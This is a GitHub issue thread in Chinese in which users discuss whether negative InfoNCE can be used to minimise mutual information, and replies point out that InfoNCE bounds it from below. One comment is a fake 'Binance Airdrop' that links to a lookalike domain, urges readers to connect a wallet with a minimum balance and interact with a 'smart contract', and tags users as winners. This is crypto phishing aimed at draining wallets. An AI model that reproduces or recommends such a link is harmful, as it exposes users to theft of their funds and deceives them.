### ISSUE TITLE
互信息最小化

### ISSUE THREAD

**Issue by imengru** [weicy15/CGI#2]
互信息最小化是用负的inforNCE吗

**Comment by yimutianyang** [comment]
Infonce不是估计互信息下界的吗，用于最小化互信息感觉不太合理

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @chany714, @marlinstrub, @joselsp95, @ervinuk, @guliyevravan, @alt3rmann, @DOGEwbx

**Comment by LindgeW** [comment]
> Infonce不是估计互信息下界的吗，用于最小化互信息感觉不太合理

InfoNCE应该是互信息最大化吧
